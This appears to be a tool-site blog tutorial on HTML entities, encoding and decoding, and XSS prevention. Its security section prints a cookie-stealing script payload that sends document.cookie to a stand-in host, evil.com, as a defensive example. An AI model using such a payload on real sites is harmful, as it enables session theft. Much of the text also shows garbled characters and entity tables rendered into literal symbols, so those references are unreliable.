What Are HTML Entities?
An HTML entity is a text string that begins with an ampersand (&) and ends with a semicolon (;). The browser replaces the entity with the corresponding character when it renders the page. For example, < becomes a less-than sign (<) and © becomes the copyright symbol (ยฉ).
Entities were critical in early web development when character encoding was inconsistent across systems. Today, with UTF-8 as the universal standard, they are still necessary for the five characters that have structural meaning in HTML, and remain useful for typographic and mathematical symbols.
There are three forms of HTML entity references:
- Named entities โ human-readable names like
&,<, - Decimal numeric references โ Unicode code point in decimal:
©for ยฉ - Hexadecimal numeric references โ Unicode code point in hex:
©for ยฉ
The Five Characters You Must Always Encode
These characters have structural meaning in HTML and must be escaped whenever they appear as content (not markup):
| Character | Named Entity | Numeric | Description |
|---|---|---|---|
< | < | < | Less-than / tag open |
> | > | > | Greater-than / tag close |
& | & | & | Ampersand / entity start |
" | " | " | Double quote / attribute delimiter |
' | ' | ' | Single quote / attribute delimiter |
Omitting these escapes does not always cause a visible problem, but it can break page structure or, more critically, open security holes.
Common Named HTML Entities Reference
Beyond the mandatory five, many named entities exist for typographic and mathematical use:
โ non-breaking space (prevents line wrap between words)©โ ยฉ copyright symbol®โ ยฎ registered trademark™โ โข trademark symbol—โ โ em dash (used in punctuation)–โ โ en dash (used in ranges like "2020โ2026")…โ โฆ horizontal ellipsis€โ โฌ euro sign£โ ยฃ pound sterling¥โ ยฅ yen sign«and»โ ยซ ยป guillemets (French quotation marks)∞โ โ infinity symbolαโ ฮฑ Greek letter alpha
Named entities are defined in the HTML specification and are universally supported. If a name doesn't exist in the spec, use a numeric reference instead.
HTML Encoding and Web Security (XSS Prevention)
One of the most important practical uses of HTML encoding is preventing Cross-Site Scripting (XSS) attacks. XSS occurs when an attacker injects malicious HTML or JavaScript into a web page that other users view.
Consider a comment form where a user submits:
<script>document.location='https://evil.com/?c='+document.cookie</script>
If the server inserts this directly into the HTML, the script runs in every visitor's browser and steals their cookies. But if the server HTML-encodes the input first, the output becomes:
<script>document.location='https://evil.com/?c='+document.cookie</script>
The browser displays the text literally instead of executing it. HTML encoding of user-supplied content before output is one of the OWASP Top 10 recommended defenses and should be applied consistently in every web application.
If you work with URL parameters, you may also need URL encoding, which is a separate but related escaping mechanism for query strings.
HTML Decoding: Converting Entities Back to Characters
Decoding is the reverse process โ converting entity references back into their original characters. You might need decoding when:
- Parsing HTML content with a script and need the plain text
- An API returns HTML-encoded JSON strings
- Copying content from a web page that has been double-encoded
- Troubleshooting why symbols appear as entity codes on a web page
In a browser environment, a simple technique is to create a textarea element, set its innerHTML to the encoded string, and read back its value. Server-side languages have built-in functions: PHP's html_entity_decode(), Python's html.unescape(), and Node.js libraries like he.
Named Entities vs. Numeric References: Which Should You Use?
Both named and numeric references are valid, but the choice matters for readability and portability:
- Use named entities for the common characters (&, <, >, , ©, —) where the name is widely known and easy to remember.
- Use numeric references for any character that doesn't have a named entity, or for obscure symbols where the name would be unknown to readers.
- Prefer UTF-8 literal characters for anything that doesn't need escaping โ modern HTML5 documents with
<meta charset="UTF-8">can contain any Unicode character directly.
When writing content management systems or templating engines, always HTML-encode dynamic content automatically rather than relying on developers to do it manually. Template engines like Jinja2, Twig, and Handlebars escape output by default for this reason.
How to Use the ToolsBox HTML Encoder / Decoder
The ToolsBox HTML Encoder / Decoder handles both directions instantly:
- Encoding โ paste plain text or HTML source containing special characters. The tool converts
<,>,&,", and'to their entity equivalents. - Decoding โ paste a string containing entity references. The tool converts them back to their original characters.
- Results are available to copy with a single click.
This is especially useful for pasting code samples into blog posts, sanitizing content before storage, or debugging double-encoded strings. You might also find the Base64 Encoder / Decoder helpful when working with binary data in web contexts.
TRY THE HTML ENCODER / DECODER โ free
Encode or decode HTML entities instantly โ no signup required.Frequently Asked Questions
What is the difference between & and &?
Both represent the ampersand character (&). & is the named entity reference, while & is the decimal numeric character reference and & is the hexadecimal form. All three produce identical output in a browser; named entities are easier to read.
Do I have to encode all special characters in HTML?
No. In modern UTF-8 HTML documents you only must encode the five characters that have special meaning in HTML markup: < > & " and '. Other Unicode characters can appear as literal UTF-8 text as long as the document charset is declared correctly.
What is HTML encoding used for in security?
HTML encoding is a primary defense against Cross-Site Scripting (XSS) attacks. By converting characters like < and > into their entity equivalents before inserting user-supplied text into a web page, you prevent the browser from interpreting that text as executable HTML or JavaScript.
How do I decode HTML entities in a string?
Paste the encoded HTML string into the ToolsBox HTML Encoder / Decoder and click Decode. The tool converts all named and numeric entity references back into their original characters instantly.
โ Back to Blog | Related tool: HTML Encoder / Decoder